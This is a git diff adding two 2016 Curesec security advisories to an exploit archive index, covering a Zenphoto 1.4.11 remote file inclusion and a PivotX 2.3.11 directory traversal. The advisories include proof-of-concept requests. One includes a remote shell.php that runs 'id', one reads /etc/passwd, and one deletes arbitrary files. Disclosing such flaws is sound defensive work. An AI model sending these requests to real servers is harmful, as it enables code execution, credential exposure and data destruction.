diff --git a/files.csv b/files.csv
index 5e03f29d5..4fc0672fd 100755
--- a/files.csv
+++ b/files.csv
@@ -13243,6 +13243,7 @@ id,file,description,date,author,platform,type,port
 15224,platforms/php/webapps/15224.txt,"js calendar 1.5.1 joomla component Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
 15225,platforms/php/webapps/15225.txt,"videodb <= 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0
 15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability",2010-10-17,FuRty,php,webapps,0
+39571,platforms/php/webapps/39571.txt,"Zenphoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80
 15269,platforms/php/webapps/15269.txt,"Tastydir <= 1.2 (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0
 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG User-Fotoalbum SQL Injection Vulnerability",2010-10-10,"Easy Laster",php,webapps,0
 15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
@@ -33347,7 +33348,7 @@ id,file,description,date,author,platform,type,port
 36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability",2015-05-07,"Filippo Roncari",xml,webapps,0
 36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80
 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal Vulnerability",2015-05-07,Vulnerability-Lab,ios,webapps,0
-36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0
+36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0
 36945,platforms/hardware/remote/36945.txt,"TP-LINK TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection Vulnerability",2012-03-12,l20ot,hardware,remote,0
 36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 Advanced Search Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0
 36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 Search Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0
@@ -35803,3 +35804,4 @@ id,file,description,date,author,platform,type,port
 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
 39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
+39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
diff --git a/platforms/php/webapps/39571.txt b/platforms/php/webapps/39571.txt
new file mode 100755
index 000000000..9931f9375
--- /dev/null
+++ b/platforms/php/webapps/39571.txt
@@ -0,0 +1,105 @@
+Security Advisory - Curesec Research Team
+
+1. Introduction
+
+Affected Product: Zenphoto 1.4.11
+Fixed in: 1.4.12
+Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/
+ zenphoto-1.4.12.zip
+Vendor Website: http://www.zenphoto.org/
+Vulnerability Type: RFI
+Remote Exploitable: Yes
+Reported to vendor: 01/29/2016
+Disclosed to 03/15/2016
+public:
+Release mode: Coordinated Release
+CVE: n/a
+Credits Tim Coen of Curesec GmbH
+
+2. Overview
+
+Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
+vulnerable to remote file inclusion. An admin account is required.
+
+3. Details
+
+Description
+
+CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
+
+When downloading a log file, the input is not properly sanitized, leading to
+RFI.
+
+An admin account is required, and allow_url_fopen must be set to true - which
+is the default setting.
+
+In old versions of PHP, this would additionally lead to LFI via null byte
+poisoning or path expansion, regardless of allow_url_fopen settings.
+
+Proof of Concept
+
+GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=
+logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=
+security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1
+
+Code
+
+// admin-logs.php (sanitize(x, 3) only strips out tags)
+ case 'download_log':
+ $zipname = sanitize($_GET['tab'], 3) . '.zip';
+ if (class_exists('ZipArchive')) {
+ $zip = new ZipArchive;
+ $zip->open($zipname, ZipArchive::CREATE);
+ $zip->addFile($file, basename($file));
+ $zip->close();
+ ob_get_clean();
+ header("Pragma: public");
+ header("Expires: 0");
+ header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+ header("Cache-Control: private", false);
+ header("Content-Type: application/zip");
+ header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
+ header("Content-Transfer-Encoding: binary");
+ header("Content-Length: " . filesize($zipname));
+ readfile($zipname);
+ // remove zip file from temp path
+ unlink($zipname);
+ exit;
+ } else {
+ include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
+ $zip = new ZipStream($zipname);
+ $zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
+ $zip->finish();
+ }
+ break;
+
+4. Solution
+
+To mitigate this issue please upgrade at least to version 1.4.12:
+
+https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
+
+Please note that a newer version might already be available.
+
+5. Report Timeline
+
+01/29/2016 Informed Vendor about Issue
+01/29/2016 Vendor replies
+02/23/2016 Vendor sends fix for verification
+02/23/2016 Suggested improvements for attempted fix
+02/29/2016 Delayed Disclosure
+03/14/2016 Vendor releases fix
+03/15/2016 Disclosed to public
+
+
+Blog Reference:
+https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
+
+--
+blog: https://blog.curesec.com
+tweet: https://twitter.com/curesec
+
+Curesec GmbH
+Curesec Research Team
+Romain-Rolland-Str 14-24
+13089 Berlin, Germany
\ No newline at end of file
diff --git a/platforms/php/webapps/39572.txt b/platforms/php/webapps/39572.txt
new file mode 100755
index 000000000..9678782cc
--- /dev/null
+++ b/platforms/php/webapps/39572.txt
@@ -0,0 +1,78 @@
+Security Advisory - Curesec Research Team
+
+1. Introduction
+
+Affected Product: PivotX 2.3.11
+Fixed in: not fixed
+Fixed Version Link: n/a
+Vendor Website: http://pivotx.net/
+Vulnerability Type: Directory Traversal
+Remote Exploitable: Yes
+Reported to vendor: 01/20/2016
+Disclosed to public: 03/15/2016
+Release mode: Full Disclosure
+CVE: n/a
+Credits Tim Coen of Curesec GmbH
+
+2. Overview
+
+PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
+vulnerable to Directory Traversal, allowing authenticated users to read and
+delete files outside of the PivotX directory.
+
+3. Details
+
+Description
+
+CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
+
+The function cleanPath which is responsible for sanitizing path names can be
+bypassed by an attacker, leading to directory traversal in multiple places.
+
+Proof of Concept
+
+Admins and Superadmins can read any file:
+
+http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=
+L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//.....//.../
+/.....//...//.....//...//.....//...//.....//...//etc/passwd
+
+Advanced users, Admins and Superadmins can delete any file, possibly leading to
+DOS:
+
+http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.....//.../
+/.....//...//.....//...//.....//...//.....//...//.....//...//important/
+important.file&pivotxsession=ovyyn4ob2jc5ym92
+
+Code
+
+lib.php
+function cleanPath($path) {
+ $path = str_replace('../', '', $path);
+ $path = str_replace('..\\', '', $path);
+ $path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
+ return $path;
+}
+
+4. Solution
+
+This issue was not fixed by the vendor.
+
+5. Report Timeline
+
+01/20/2016 Informed Vendor about Issue
+01/29/2016 Vendor replies, PivotX is not maintained anymore
+03/15/2016 Disclosed to public
+
+
+Blog Reference:
+https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
+
+--
+blog: https://blog.curesec.com
+tweet: https://twitter.com/curesec
+
+Curesec GmbH
+Curesec Research Team
+Romain-Rolland-Str 14-24
+13089 Berlin, Germany
\ No newline at end of file